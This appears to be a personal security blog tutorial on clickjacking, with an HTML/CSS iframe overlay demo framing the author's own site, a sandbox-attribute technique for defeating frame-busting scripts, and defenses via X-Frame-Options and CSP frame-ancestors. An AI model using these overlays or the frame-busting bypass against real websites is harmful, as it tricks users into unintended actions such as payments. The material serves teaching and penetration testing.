Before we get into the content here I want to clarify that I wasn’t able to find any CTF-type examples of clickjacking, so if you know of one please let me know.
What is Clickjacking?#
Clickjacking is an attack where a user is tricked into clicking on actionable content on a hidden website when they attempt to interact with contents for a real website.
This is a bit vague but a few examples should help with visualizing the attack. Imagine you click on an email that asks you to donate a few dollars to charity and all you need to do is enter some payment information and press a submit button. Without the victim’s knowledge, the input is actually being used to perform a transaction on another site.
“How did this happen?” the user thinks to themselves…
The attack relies on an invisible but actionable web page, or series of web pages that contain a button or hidden link within an iframe. These inline frames (iframe) is an HTML element that loads another HTML page within the same document, essentially putting another webpage inside the parent page.
You overlay the iframe over the decoy web page content, so that when the user clicks and enters information on your decoy site, it is actually being entered into another site. This is different from a CSRF attack because the user is required to manually interact with the page.
What Does This Actually Look Like?#
You’ll need a little bit of experience with CSS and HTML, but it is all pretty straightforward. You incorporate a target website as an iframe layer over a decoy website.
<style>
iframe {
position:relative;
width:800;
height: 800;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:25;
left:555;
z-index: 1;
}
</style>
<div>Free money if you click here!</div>
<iframe src="https://gaberoy.zip"></iframe>
I made this example using my site. In this case I have the opacity set to very low to help you see how it might work.
You want to precisely place the button over the action you’d like the victim to perform. In my case, I want the victim to view the Home page on my site which just about lines up with the <div> element.
Of course this isn’t limited to just single clicks, if you know how the target web application fills out forms, you could add some of that to your included iframe. For example, if you wanted people to leave a comment on your blog you could use the URL-parameters as the comment’s form information and steal that click.
Countermeasures#
These attacks are possible whenever a website is frameable. Sometimes sites will use frame-busting scripts to prevent against clickjacking. These scripts that are built into some browser extensions and some common browsers usually perform some or all of these:
- Enforce that the application window is the top window
- Make every frame visible
- Prevent clicking on frames that aren’t visible
- Intercept and flag potential clickjacking attacks
If you want to workaround this you could try using the HTML5 iframe sandbox attribute. When this is set to allow-forms or allow-scripts and allow-top-navigation is omitted, some frame-busting scripts will be effectively neutralized as the iframe can’t tell if it is the real top window.
It might look like this:
<iframe id="vulnerable_website" src="vulnerable_website" sandbox="allow-forms"></iframe>
Both the allow-forms and allow-scripts values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviors while allowing functionality within the targeted site.
You can also combine this with XSS attacks and even implementing multiple steps. So when you see something like this in a pentest, don’t stop there and really try to get creative.
Prevention#
This is a browser vulnerability and has two really popular and easy to use countermeasures for you to use that aren’t frame-busting scripts.
X-Frame Options#
This header gives the website owner the ability to control whether or not their site can be framed with these pretty self-explanatory directives:
X-Frame-Options: deny
X-Frame-Options: same-origin
X-Frame-Options: allow-from https://example_website.com
Content Security Policy#
There is also a really handy CSP directive for preventing clickjacking attacks which called frame-ancestors. You could establish these in a similar fashion to the X-Frame-Options:
Content-Security-Policy: frame-ancestors 'self';
Content-Security-Policy: frame-ancestors example_website.com;
Of course, make sure you test these in your environment before pushing to production if possible. These fixes aren’t always perfect and might still leave you vulnerable.